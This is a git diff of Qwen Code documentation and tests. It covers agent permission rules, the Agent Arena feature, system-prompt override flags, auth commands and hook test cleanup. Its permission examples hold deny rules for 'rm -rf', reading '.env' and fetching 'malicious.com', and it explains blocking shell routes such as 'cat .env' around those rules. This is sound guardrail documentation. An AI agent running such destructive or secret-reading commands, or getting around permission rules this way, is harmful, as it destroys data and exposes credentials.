(any of these work in rules):** + +| Alias | Canonical tool | Notes | +| --------------------- | ------------------- | ------------------------- | +| `Bash`, `Shell` | `run_shell_command` | | +| `Read`, `ReadFile` | `read_file` | Meta-category — see below | +| `Edit`, `EditFile` | `edit` | Meta-category — see below | +| `Write`, `WriteFile` | `write_file` | | +| `Grep`, `SearchFiles` | `grep_search` | | +| `Glob`, `FindFiles` | `glob` | | +| `ListFiles` | `list_directory` | | +| `WebFetch` | `web_fetch` | | +| `Agent` | `task` | | +| `Skill` | `skill` | | + +**Meta-categories:** + +Some rule names automatically cover multiple tools: + +| Rule name | Tools covered | +| --------- | ---------------------------------------------------- | +| `Read` | `read_file`, `grep_search`, `glob`, `list_directory` | +| `Edit` | `edit`, `write_file` | + +> [!important] +> `Read(/path/**)` matches **all four** read tools (file read, grep, glob, and directory listing). +> To restrict only file reading, use `ReadFile(/path/**)` or `read_file(/path/**)`. + +**Rule syntax examples:** + +| Rule | Meaning | +| ----------------------------- | -------------------------------------------------------------- | +| `"Bash"` | All shell commands | +| `"Bash(git *)"` | Shell commands starting with `git` (word boundary: NOT `gitk`) | +| `"Bash(git push *)"` | Shell commands like `git push origin main` | +| `"Bash(npm run *)"` | Any `npm run` script | +| `"Read"` | All file read operations (read, grep, glob, list) | +| `"Read(./secrets/**)"` | Read any file under `./secrets/` recursively | +| `"Edit(/src/**/*.ts)"` | Edit TypeScript files under project root `/src/` | +| `"WebFetch(api.example.com)"` | Fetch from `api.example.com` and all its subdomains | +| `"mcp__puppeteer"` | All tools from the puppeteer MCP server | + +**Path pattern prefixes:** + +| Prefix | Meaning | Example | +| ------ | ------------------------------------- | ------------------- | +| `//` | Absolute path from filesystem root | `//etc/passwd` | +| `~/` | Relative to home directory | `~/Documents/*.pdf` | +| `/` | Relative to project root | `/src/**/*.ts` | +| `./` | Relative to current working directory | `./secrets/**` | +| (none) | Same as `./` | `secrets/**` | + +**Shell command bypass prevention:** + +Permission rules for `Read`, `Edit`, and `WebFetch` are also enforced when the agent runs equivalent shell commands. For example, if `Read(./.env)` is in `deny`, the agent cannot bypass it via `cat .env` in a shell command. Supported shell commands include `cat`, `grep`, `curl`, `wget`, `cp`, `mv`, `rm`, `chmod`, and many more. Unknown/safe commands (e.g. `git`) are unaffected by file/network rules. + +**Migrating from legacy settings:** + +| Legacy setting | Equivalent `permissions` rule | Notes | +| --------------- | ------------------------------- | ------------------------------------------------------------ | +| `tools.allowed` | `permissions.allow` | Auto-migrated on first load | +| `tools.exclude` | `permissions.deny` | Auto-migrated on first load | +| `tools.core` | `permissions.allow` (allowlist) | Auto-migrated; unlisted tools are disabled at registry level | + +**Example configuration:** + +```json +{ + "permissions": { + "allow": ["Bash(git *)", "Bash(npm run *)", "Read(//Users/alice/code/**)"], + "ask": ["Bash(git push *)", "Edit"], + "deny": ["Bash(rm -rf *)", "Read(.env)", "WebFetch(malicious.com)"] + } +} +``` + +> [!tip] +> Use `/permissions` in the interactive CLI to view, add, and remove rules without editing `settings.json` directly. + #### mcp | Setting | Type | Description | Default | @@ -350,11 +445,6 @@ Here is an example of a `settings.json` file with the nested structure, new as o "maxSessionTurns": 10, "enableOpenAILogging": false, "openAILoggingDir": "~/qwen-logs", - "summarizeToolOutput": { - "run_shell_command": { - "tokenBudget": 100 - } - } }, "context": { "fileName": ["CONTEXT.md", "QWEN.md"], @@ -419,6 +509,8 @@ Arguments passed directly when running the CLI can override other configurations | `--model` | `-m` | Specifies the Qwen model to use for this session. | Model name | Example: `npm start -- --model qwen3-coder-plus` | | `--prompt` | `-p` | Used to pass a prompt directly to the command. This invokes Qwen Code in a non-interactive mode. | Your prompt text | For scripting examples, use the `--output-format json` flag to get structured output. | | `--prompt-interactive` | `-i` | Starts an interactive session with the provided prompt as the initial input. | Your prompt text | The prompt is processed within the interactive session, not before it. Cannot be used when piping input from stdin. Example: `qwen -i "explain this code"` | +| `--system-prompt` | | Overrides the built-in main session system prompt for this run. | Your prompt text | Loaded context files such as `QWEN.md` are still appended after this override. Can be combined with `--append-system-prompt`. | +| `--append-system-prompt` | | Appends extra instructions to the main session system prompt for this run. | Your prompt text | Applied after the built-in prompt and loaded context files. Can be combined with `--system-prompt`. See [Headless Mode](../features/headless) for examples. | | `--output-format` | `-o` | Specifies the format of the CLI output for non-interactive mode. | `text`, `json`, `stream-json` | `text`: (Default) The standard human-readable output. `json`: A machine-readable JSON output emitted at the end of execution. `stream-json`: Streaming JSON messages emitted as they occur during execution. For structured output and scripting, use the `--output-format json` or `--output-format stream-json` flag. See [Headless Mode](../features/headless) for detailed information. | | `--input-format` | | Specifies the format consumed from standard input. | `text`, `stream-json` | `text`: (Default) Standard text input from stdin or command-line arguments. `stream-json`: JSON message protocol via stdin for bidirectional communication. Requirement: `--input-format stream-json` requires `--output-format stream-json` to be set. When using `stream-json`, stdin is reserved for protocol messages. See [Headless Mode](../features/headless) for detailed information. | | `--include-partial-messages` | | Include partial assistant messages when using `stream-json` output format. When enabled, emits stream events (message_start, content_block_delta, etc.) as they occur during streaming. | | Default: `false`. Requirement: Requires `--output-format stream-json` to be set. See [Headless Mode](../features/headless) for detailed information about stream events. | diff --git a/docs/users/features/_meta.ts b/docs/users/features/_meta.ts index f5218e85f..9cf6d403f 100644 --- a/docs/users/features/_meta.ts +++ b/docs/users/features/_meta.ts @@ -1,6 +1,7 @@ export default { commands: 'Commands', 'sub-agents': 'SubAgents', + arena: 'Agent Arena', skills: 'Skills', headless: 'Headless Mode', checkpointing: { diff --git a/docs/users/features/arena.md b/docs/users/features/arena.md new file mode 100644 index 000000000..7b53238c7 --- /dev/null +++ b/docs/users/features/arena.md @@ -0,0 +1,218 @@ +# Agent Arena + +> Dispatch multiple AI models simultaneously to execute the same task, compare their solutions side-by-side, and select the best result to apply to your workspace. + +> [!warning] +> Agent Arena is experimental. It has [known limitations](#limitations) around display modes and session management. + +Agent Arena lets you pit multiple AI models against each other on the same task. Each model runs as a fully independent agent in its own isolated Git worktree, so file operations never interfere. When all agents finish, you compare results and select a winner to merge back into your main workspace. + +Unlike [subagents](/users/features/sub-agents), which delegate focused subtasks within a single session, Arena agents are complete, top-level agent instances — each with its own model, context window, and full tool access. + +This page covers: + +- [When to use Agent Arena](#when-to-use-agent-arena) +- [Starting an arena session](#start-an-arena-session) +- [Interacting with agents](#interact-with-agents), including display modes and navigation +- [Comparing results and selecting a winner](#compare-results-and-select-a-winner) +- [Best practices](#best-practices) + +## When to use Agent Arena + +Agent Arena is most effective when you want to **evaluate or compare** how different models tackle the same problem. The strongest use cases are: + +- **Model benchmarking**: Evaluate different models' capabilities on real tasks in your actual codebase, not synthetic benchmarks +- **Best-of-N selection**: Get multiple independent solutions and pick the best implementation +- **Exploring approaches**: See how different models reason about and solve the same problem — useful for learning and insight +- **Risk reduction**: For critical changes, validate that multiple models converge on a similar approach before committing + +Agent Arena uses significantly more tokens than a single session (each agent has its own context window and model calls). It works best when the value of comparison justifies the cost. For routine tasks where you trust your default model, a single session is more efficient. + +## Start an arena session + +Use the `/arena` slash command to launch a session. Specify the models you want to compete and the task: + +``` +/arena --models qwen3.5-plus,glm-5,kimi-k2.5 "Refactor the authentication module to use JWT tokens" +``` + +If you omit `--models`, an interactive model selection dialog appears, letting you pick from your configured providers. + +### What happens when you start + +1. **Worktree setup**: Qwen Code creates isolated Git worktrees for each agent at `~/.qwen/arena//worktrees//`. Each worktree mirrors your current working directory state exactly — including staged changes, unstaged changes, and untracked files. +2. **Agent spawning**: Each agent starts in its own worktree with full tool access and its configured model. Agents are launched sequentially but execute in parallel. +3. **Execution**: All agents work on the task independently with no shared state or communication. You can monitor their progress and interact with any of them. +4. **Completion**: When all agents finish (or fail), you enter the result comparison phase. + +## Interact with agents + +### Display modes + +Agent Arena currently supports **in-process mode**, where all agents run asynchronously within the same terminal process. A tab bar at the bottom of the terminal lets you switch between agents. + +> [!note] +> **Split-pane display modes are planned for the future.** We intend to support tmux-based and iTerm2-based split-pane layouts, where each agent gets its own terminal pane for true side-by-side viewing. Currently, only in-process tab switching is available. + +### Navigate between agents + +In in-process mode, use keyboard shortcuts to switch between agent views: + +| Shortcut | Action | +| :------- | :-------------------------------- | +| `Right` | Switch to the next agent tab | +| `Left` | Switch to the previous agent tab | +| `Up` | Switch focus to the input box | +| `Down` | Switch focus to the agent tab bar | + +The tab bar shows each agent's current status: + +| Indicator | Meaning | +| :-------- | :--------------------- | +| `●` | Running or idle | +| `✓` | Completed successfully | +| `✗` | Failed | +| `○` | Cancelled | + +### Interact with individual agents + +When viewing an agent's tab, you can: + +- **Send messages** — type in the input area to give the agent additional instructions +- **Approve tool calls** — if an agent requests tool approval, the confirmation dialog appears in its tab +- **View full history** — scroll through the agent's complete conversation, including model output, tool calls, and results + +Each agent is a full, independent session. Anything you can do with the main agent, you can do with an arena agent. + +## Compare results and select a winner + +When all agents complete, the Arena enters the result comparison phase. You'll see: + +- **Status summary**: Which agents succeeded, failed, or were cancelled +- **Execution metrics**: Duration, rounds of reasoning, token usage, and tool call counts for each agent + +A selection dialog presents the successful agents. Choose one to apply its changes to your main workspace, or discard all results. + +### What happens when you select a winner + +1. The winning agent's changes are extracted as a diff against the baseline +2. The diff is applied to your main working directory +3. All worktrees and temporary branches are cleaned up automatically + +If you want to inspect results before deciding, each agent's full conversation history is available via the tab bar while the selection dialog is active. + +## Configuration + +Arena behavior can be customized in [settings.json](/users/configuration/settings): + +```json +{ + "arena": { + "worktreeBaseDir": "~/.qwen/arena", + "maxRoundsPerAgent": 50, + "timeoutSeconds": 600 + } +} +``` + +| Setting | Description | Default | +| :------------------------ | :--------------------------------- | :-------------- | +| `arena.worktreeBaseDir` | Base directory for arena worktrees | `~/.qwen/arena` | +| `arena.maxRoundsPerAgent` | Maximum reasoning rounds per agent | `50` | +| `arena.timeoutSeconds` | Timeout for each agent in seconds | `600` | + +## Best practices + +### Choose models that complement each other + +Arena is most valuable when you compare models with meaningfully different strengths. For example: + +``` +/arena --models qwen3.5-plus,glm-5,kimi-k2.5 "Optimize the database query layer" +``` + +Comparing three versions of the same model family yields less insight than comparing across providers. + +### Keep tasks self-contained + +Arena agents work independently with no communication. Tasks should be fully describable in the prompt without requiring back-and-forth: + +**Good**: "Refactor the payment module to use the strategy pattern. Update all tests." + +**Less effective**: "Let's discuss how to improve the payment module" — this benefits from conversation, which is better suited to a single session. + +### Limit the number of agents + +Up to 5 agents can run simultaneously. In practice, 2-3 agents provide the best balance of comparison value to resource cost. More agents means: + +- Higher token costs (each agent has its own context window) +- Longer total execution time +- More results to compare + +Start with 2-3 and scale up only when the comparison value justifies it. + +### Use Arena for high-impact decisions + +Arena shines when the stakes justify running multiple models: + +- Choosing an architecture for a new module +- Selecting an approach for a complex refactor +- Validating a critical bug fix from multiple angles + +For routine changes like renaming a variable or updating a config file, a single session is faster and cheaper. + +## Troubleshooting + +### Agents failing to start + +- Verify that each model in `--models` is properly configured with valid API credentials +- Check that your working directory is a Git repository (worktrees require Git) +- Ensure you have write access to the worktree base directory (`~/.qwen/arena/` by default) + +### Worktree creation fails + +- Run `git worktree list` to check for stale worktrees from previous sessions +- Clean up stale worktrees with `git worktree prune` +- Ensure your Git version supports worktrees (`git --version`, requires Git 2.5+) + +### Agent takes too long + +- Increase the timeout: set `arena.timeoutSeconds` in settings +- Reduce task complexity — Arena tasks should be focused and well-defined +- Lower `arena.maxRoundsPerAgent` if agents are spending too many rounds + +### Applying winner fails + +- Check for uncommitted changes in your main working directory that might conflict +- The diff is applied as a patch — merge conflicts are possible if your working directory changed during the session + +## Limitations + +Agent Arena is experimental. Current limitations: + +- **In-process mode only**: Split-pane display via tmux or iTerm2 is not yet available. All agents run within a single terminal window with tab switching. +- **No diff preview before selection**: You can view each agent's conversation history, but there is no unified diff viewer to compare solutions side-by-side before picking a winner. +- **No worktree retention**: Worktrees are always cleaned up after selection. There is no option to preserve them for further inspection. +- **No session resumption**: Arena sessions cannot be resumed after exiting. If you close the terminal mid-session, worktrees remain on disk and must be cleaned up manually via `git worktree prune`. +- **Maximum 5 agents**: The hard limit of 5 concurrent agents cannot be changed. +- **Git repository required**: Arena requires a Git repository for worktree isolation. It cannot be used in non-Git directories. + +## Comparison with other multi-agent modes + +Agent Arena is one of several planned multi-agent modes in Qwen Code. **Agent Team** and **Agent Swarm** are not yet implemented — the table below describes their intended design for reference. + +| | **Agent Arena** | **Agent Team** (planned) | **Agent Swarm** (planned) | +| :---------------- | :----------------------------------------------------- | :------------------------------------------------- | :------------------------------------------------------- | +| **Goal** | Competitive: Find the best solution to the _same_ task | Collaborative: Tackle _different_ aspects together | Batch parallel: Dynamically spawn workers for bulk tasks | +| **Agents** | Pre-configured models compete independently | Teammates collaborate with assigned roles | Workers spawned on-the-fly, destroyed on completion | +| **Communication** | No inter-agent communication | Direct peer-to-peer messaging | One-way: results aggregated by parent | +| **Isolation** | Full: separate Git worktrees | Independent sessions with shared task list | Lightweight ephemeral context per worker | +| **Output** | One selected solution applied to workspace | Synthesized results from multiple perspectives | Aggregated results from parallel processing | +| **Best for** | Benchmarking, choosing between model approaches | Research, complex collaboration, cross-layer work | Batch operations, data processing, map-reduce tasks | + +## Next steps + +Explore related approaches for parallel and delegated work: + +- **Lightweight delegation**: [Subagents](/users/features/sub-agents) handle focused subtasks within your session — better when you don't need model comparison +- **Manual parallel sessions**: Run multiple Qwen Code sessions yourself in separate terminals with [Git worktrees](https://git-scm.com/docs/git-worktree) for full manual control diff --git a/docs/users/features/commands.md b/docs/users/features/commands.md index ba980db80..faa3ec323 100644 --- a/docs/users/features/commands.md +++ b/docs/users/features/commands.md @@ -33,6 +33,7 @@ Commands for adjusting interface appearance and work environment. | Command | Description | Usage Examples | | ------------ | ---------------------------------------- | ----------------------------- | | `/clear` | Clear terminal screen content | `/clear` (shortcut: `Ctrl+L`) | +| `/context` | Show context window usage breakdown | `/context` | | `/theme` | Change Qwen Code visual theme | `/theme` | | `/vim` | Turn input area Vim editing mode on/off | `/vim` | | `/directory` | Manage multi-directory support workspace | `/dir add ./src,./tests` | @@ -94,6 +95,22 @@ Commands for obtaining information and performing system settings. | `Ctrl/cmd+Z` | Undo input | Text editing | | `Ctrl/cmd+Shift+Z` | Redo input | Text editing | +### 1.7 CLI Auth Subcommands + +In addition to the in-session `/auth` slash command, Qwen Code provides standalone CLI subcommands for managing authentication directly from the terminal: + +| Command | Description | +| ---------------------------------------------------- | ------------------------------------------------- | +| `qwen auth` | Interactive authentication setup | +| `qwen auth qwen-oauth` | Authenticate with Qwen OAuth | +| `qwen auth coding-plan` | Authenticate with Alibaba Cloud Coding Plan | +| `qwen auth coding-plan --region china --key sk-sp-…` | Non-interactive Coding Plan setup (for scripting) | +| `qwen auth status` | Show current authentication status | + +> [!tip] +> +> These commands run outside of a Qwen Code session. Use them to configure authentication before starting a session, or in scripts and CI environments. See the [Authentication](../configuration/auth) page for full details. + ## 2. @ Commands (Introducing Files) @ commands are used to quickly add local file or directory content to the conversation. diff --git a/docs/users/features/headless.md b/docs/users/features/headless.md index 203e08a2d..12172f121 100644 --- a/docs/users/features/headless.md +++ b/docs/users/features/headless.md @@ -58,6 +58,40 @@ qwen --resume 123e4567-e89b-12d3-a456-426614174000 -p "Apply the follow-up refac > - Session data is project-scoped JSONL under `~/.qwen/projects//chats`. > - Restores conversation history, tool outputs, and chat-compression checkpoints before sending the new prompt. +## Customize the Main Session Prompt + +You can change the main session system prompt for a single CLI run without editing shared memory files. + +### Override the Built-in System Prompt + +Use `--system-prompt` to replace Qwen Code's built-in main-session prompt for the current run: + +```bash +qwen -p "Review this patch" --system-prompt "You are a terse release reviewer. Report only blocking issues." +``` + +### Append Extra Instructions + +Use `--append-system-prompt` to keep the built-in prompt and add extra instructions for this run: + +```bash +qwen -p "Review this patch" --append-system-prompt "Be terse and focus on concrete findings." +``` + +You can combine both flags when you want a custom base prompt plus an extra run-specific instruction: + +```bash +qwen -p "Summarize this repository" \ + --system-prompt "You are a migration planner." \ + --append-system-prompt "Return exactly three bullets." +``` + +> [!note] +> +> - `--system-prompt` applies only to the current run's main session. +> - Loaded memory and context files such as `QWEN.md` are still appended after `--system-prompt`. +> - `--append-system-prompt` is applied after the built-in prompt and loaded memory, and can be used together with `--system-prompt`. + ## Output Formats Qwen Code supports multiple output formats for different use cases: @@ -189,19 +223,21 @@ qwen -p "Write code" --output-format stream-json --include-partial-messages | jq Key command-line options for headless usage: -| Option | Description | Example | -| ---------------------------- | --------------------------------------------------- | ------------------------------------------------------------------------ | -| `--prompt`, `-p` | Run in headless mode | `qwen -p "query"` | -| `--output-format`, `-o` | Specify output format (text, json, stream-json) | `qwen -p "query" --output-format json` | -| `--input-format` | Specify input format (text, stream-json) | `qwen --input-format text --output-format stream-json` | -| `--include-partial-messages` | Include partial messages in stream-json output | `qwen -p "query" --output-format stream-json --include-partial-messages` | -| `--debug`, `-d` | Enable debug mode | `qwen -p "query" --debug` | -| `--all-files`, `-a` | Include all files in context | `qwen -p "query" --all-files` | -| `--include-directories` | Include additional directories | `qwen -p "query" --include-directories src,docs` | -| `--yolo`, `-y` | Auto-approve all actions | `qwen -p "query" --yolo` | -| `--approval-mode` | Set approval mode | `qwen -p "query" --approval-mode auto_edit` | -| `--continue` | Resume the most recent session for this project | `qwen --continue -p "Pick up where we left off"` | -| `--resume [sessionId]` | Resume a specific session (or choose interactively) | `qwen --resume 123e... -p "Finish the refactor"` | +| Option | Description | Example | +| ---------------------------- | ------------------------------------------------------------------------ | ------------------------------------------------------------------------ | +| `--prompt`, `-p` | Run in headless mode | `qwen -p "query"` | +| `--output-format`, `-o` | Specify output format (text, json, stream-json) | `qwen -p "query" --output-format json` | +| `--input-format` | Specify input format (text, stream-json) | `qwen --input-format text --output-format stream-json` | +| `--include-partial-messages` | Include partial messages in stream-json output | `qwen -p "query" --output-format stream-json --include-partial-messages` | +| `--system-prompt` | Override the main session system prompt for this run | `qwen -p "query" --system-prompt "You are a terse reviewer."` | +| `--append-system-prompt` | Append extra instructions to the main session system prompt for this run | `qwen -p "query" --append-system-prompt "Focus on concrete findings."` | +| `--debug`, `-d` | Enable debug mode | `qwen -p "query" --debug` | +| `--all-files`, `-a` | Include all files in context | `qwen -p "query" --all-files` | +| `--include-directories` | Include additional directories | `qwen -p "query" --include-directories src,docs` | +| `--yolo`, `-y` | Auto-approve all actions | `qwen -p "query" --yolo` | +| `--approval-mode` | Set approval mode | `qwen -p "query" --approval-mode auto_edit` | +| `--continue` | Resume the most recent session for this project | `qwen --continue -p "Pick up where we left off"` | +| `--resume [sessionId]` | Resume a specific session (or choose interactively) | `qwen --resume 123e... -p "Finish the refactor"` | For complete details on all available configuration options, settings files, and environment variables, see the [Configuration Guide](../configuration/settings). diff --git a/docs/users/features/sandbox.md b/docs/users/features/sandbox.md index 72005f959..ba5e477e0 100644 --- a/docs/users/features/sandbox.md +++ b/docs/users/features/sandbox.md @@ -181,6 +181,29 @@ export SANDBOX_SET_UID_GID=false # Disable UID/GID mapping - Container sandbox: add them via `.qwen/sandbox.Dockerfile` or `.qwen/sandbox.bashrc`. - Seatbelt: your host binaries are used, but the sandbox may restrict access to some paths. +**Java not available in Docker sandbox** + +The official Qwen Code Docker image is intentionally minimal to keep the image small, secure, and fast to pull. Different users require different language runtimes (Java, Python, Node.js, etc.), and bundling all environments into a single image is not practical. Therefore, Java is **not included by default** in the Docker sandbox. + +If your workflow requires Java, you can extend the base image by creating a `.qwen/sandbox.Dockerfile` in your project: + +```dockerfile +FROM ghcr.io/qwenlm/qwen-code:latest + +RUN apt-get update && \ + apt-get install -y openjdk-17-jre && \ + apt-get clean && \ + rm -rf /var/lib/apt/lists/* +``` + +Then rebuild the sandbox image: + +```bash +QWEN_SANDBOX=docker BUILD_SANDBOX=1 qwen -s +``` + +For more details on customizing the sandbox, see [Customizing the sandbox environment](/developers/tools/sandbox). + **Network issues** - Check sandbox profile allows network. diff --git a/docs/users/features/sub-agents.md b/docs/users/features/sub-agents.md index 85ca4aff9..256034e3c 100644 --- a/docs/users/features/sub-agents.md +++ b/docs/users/features/sub-agents.md @@ -502,3 +502,10 @@ Always follow these standards: - **Access Control**: Project and user-level separation provides appropriate boundaries - **Sensitive Information**: Avoid including secrets or credentials in agent configurations - **Production Environments**: Consider separate agents for production vs development environments + +## Limits + +The following soft warnings apply to Subagent configurations (no hard limits are enforced): + +- **Description Field**: A warning is shown for descriptions exceeding 1,000 characters +- **System Prompt**: A warning is shown for system prompts exceeding 10,000 characters diff --git a/docs/users/integration-jetbrains.md b/docs/users/integration-jetbrains.md index 3f4739eab..baced8149 100644 --- a/docs/users/integration-jetbrains.md +++ b/docs/users/integration-jetbrains.md @@ -16,6 +16,30 @@ ### Installation +#### Install from ACP Registry (Recommend) + +1. Install Qwen Code CLI: + + ```bash + npm install -g @qwen-code/qwen-code + ``` + +2. Open your JetBrains IDE and navigate to AI Chat tool window. + +3. Click **Add ACP Agent**, then click **Install**. + + ![Install](https://img.alicdn.com/imgextra/i4/O1CN01qNdPCW1y8AcqxRgCy_!!6000000006533-2-tps-2490-1788.png) + + For users using JetBrains AI Assistant and/or other ACP agents, click **Install From ACP Registry** in Agents List, then install Qwen Code ACP. + + ![Add from Agents List](https://img.alicdn.com/imgextra/i2/O1CN01ZyOugP26BOKzNgZXx_!!6000000007623-2-tps-479-523.png) + +4. The Qwen Code agent should now be available in the AI Assistant panel. + + ![Qwen Code in JetBrains AI Chat](https://img.alicdn.com/imgextra/i4/O1CN013kAVE41XVzbIZOxyv_!!6000000002930-2-tps-3188-2170.png) + +#### Manual Install (for older version of JetBrains IDEs) + 1. Install Qwen Code CLI: ```bash diff --git a/docs/users/integration-zed.md b/docs/users/integration-zed.md index 7379bf69b..003d31709 100644 --- a/docs/users/integration-zed.md +++ b/docs/users/integration-zed.md @@ -18,6 +18,24 @@ ### Installation +#### Install from ACP Registry (Recommend) + +1. Install Qwen Code CLI: + +```bash +npm install -g @qwen-code/qwen-code +``` + +2. Download and install [Zed Editor](https://zed.dev/) + +3. In Zed, click the **settings button** in the top right corner, select **"Add agent"**, choose **"Install from Registry"**, find **Qwen Code**, then click **Install**. + + ![ACP Registry](https://img.alicdn.com/imgextra/i4/O1CN0186ybL61EeG35fHFjy_!!6000000000376-2-tps-3056-1705.png) + + ![Qwen Code ACP Installed](https://img.alicdn.com/imgextra/i1/O1CN01OXHhoR1J8irAvjs8F_!!6000000000984-2-tps-1247-703.png) + +#### Manual Install + 1. Install Qwen Code CLI: ```bash diff --git a/docs/users/quickstart.md b/docs/users/quickstart.md index 3c4eafcea..4d9e561e4 100644 --- a/docs/users/quickstart.md +++ b/docs/users/quickstart.md @@ -54,7 +54,7 @@ brew install qwen-code ## Step 2: Log in to your account -Qwen Code requires an account to use. When you start an interactive session with the `qwen` command, you'll need to log in: +Qwen Code requires an account to use. When you start an interactive session with the `qwen` command, you'll be prompted to log in: ```bash # You'll be prompted to log in on first use @@ -74,7 +74,7 @@ Select `Qwen OAuth`, log in to your account and follow the prompts to confirm. O > [!tip] > -> If you need to log in again or switch accounts, use the `/auth` command within Qwen Code. +> You can also configure authentication directly from the terminal without starting a session by running `qwen auth`. Use `qwen auth status` to check your current configuration at any time. See the [Authentication](./configuration/auth) page for details. ## Step 3: Start your first session @@ -216,7 +216,9 @@ Here are the most important commands for daily use: | Command | What it does | Example | | --------------------- | ------------------------------------------------ | ----------------------------- | | `qwen` | start Qwen Code | `qwen` | -| `/auth` | Change authentication method | `/auth` | +| `/auth` | Change authentication method (in session) | `/auth` | +| `qwen auth` | Configure authentication from the terminal | `qwen auth` | +| `qwen auth status` | Check current authentication status | `qwen auth status` | | `/help` | Display help information for available commands | `/help` or `/?` | | `/compress` | Replace chat history with summary to save Tokens | `/compress` | | `/clear` | Clear terminal screen content | `/clear` (shortcut: `Ctrl+L`) | diff --git a/eslint.config.js b/eslint.config.js index d0963e876..7b54f58a8 100644 --- a/eslint.config.js +++ b/eslint.config.js @@ -59,6 +59,7 @@ export default tseslint.config( ...importPlugin.configs.typescript.rules, 'import/no-default-export': 'warn', 'import/no-unresolved': 'off', // Disable for now, can be noisy with monorepos/paths + 'import/namespace': 'off', // Disabled due to https://github.com/import-js/eslint-plugin-import/issues/2866 }, }, { diff --git a/integration-tests/fixtures/settings-migration/workspaces.json b/integration-tests/fixtures/settings-migration/workspaces.json index af7a48f84..bd9798009 100644 --- a/integration-tests/fixtures/settings-migration/workspaces.json +++ b/integration-tests/fixtures/settings-migration/workspaces.json @@ -43,7 +43,6 @@ "maxSessionTurns": 50, "preferredEditor": "vscode", "sandbox": false, - "summarizeToolOutput": true, "telemetry": { "enabled": false }, diff --git a/integration-tests/hook-integration/hooks.test.ts b/integration-tests/hook-integration/hooks.test.ts index e5c860d4b..affb1670d 100644 --- a/integration-tests/hook-integration/hooks.test.ts +++ b/integration-tests/hook-integration/hooks.test.ts @@ -7,12 +7,17 @@ import { TestRig, validateModelOutput } from '../test-helper.js'; * Tests for complete hook system flow including: * - UserPromptSubmit hooks: Triggered before prompt is sent to LLM * - Stop hooks: Triggered when agent is about to stop + * - SessionStart hooks: Triggered when a new session starts (Startup, Resume, Clear, Compact) + * - SessionEnd hooks: Triggered when a session ends (Clear, Logout, PromptInputExit) + * - PreToolUse hooks: Triggered before tool execution + * - PostToolUse hooks: Triggered after successful tool execution + * - PostToolUseFailure hooks: Triggered after tool execution fails + * - SubagentStart hooks: Triggered when a subagent starts + * - SubagentStop hooks: Triggered when a subagent stops + * - Notification hooks: Triggered when notifications are sent + * - PermissionRequest hooks: Triggered when permission dialogs are displayed + * - PreCompact hooks: Triggered before conversation compaction * - * Test categories: - * - Single hook scenarios (allow, block, modify, context, etc.) - * - Multiple hooks scenarios (parallel, sequential, mixed) - * - Error handling (timeout, missing command, exit codes) - * - Combined hooks (multiple hook types in same session) */ describe('Hooks System Integration', () => { let rig: TestRig; @@ -54,7 +59,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -84,7 +88,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -120,7 +123,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -150,7 +152,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -198,7 +199,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -229,7 +229,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -257,7 +256,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -286,7 +284,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -313,7 +310,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -339,7 +335,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -372,7 +367,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -403,7 +397,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -442,7 +435,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -476,7 +468,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -517,7 +508,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -562,7 +552,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -601,7 +590,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -638,7 +626,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -673,7 +660,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -708,7 +694,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -750,7 +735,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -791,7 +775,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -829,7 +812,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -866,7 +848,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -903,7 +884,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -932,7 +912,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -967,7 +946,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1009,7 +987,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1052,7 +1029,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1089,7 +1065,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1098,37 +1073,6 @@ describe('Hooks System Integration', () => { }); }); - describe('Stop Reason', () => { - it('should include stop reason when hook provides it', async () => { - const reasonScript = - 'echo \'{"decision": "allow", "stopReason": "Custom stop reason from hook"}\''; - - await rig.setup('stop-set-reason', { - settings: { - hooksConfig: { enabled: true }, - hooks: { - Stop: [ - { - hooks: [ - { - type: 'command', - command: reasonScript, - name: 'stop-reason-hook', - timeout: 5000, - }, - ], - }, - ], - }, - trusted: true, - }, - }); - - const result = await rig.run('Say reason test'); - expect(result).toBeDefined(); - }); - }); - describe('Timeout Handling', () => { it('should continue stopping when hook times out', async () => { await rig.setup('stop-timeout', { @@ -1148,7 +1092,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1177,7 +1120,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1204,7 +1146,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1236,7 +1177,6 @@ describe('Hooks System 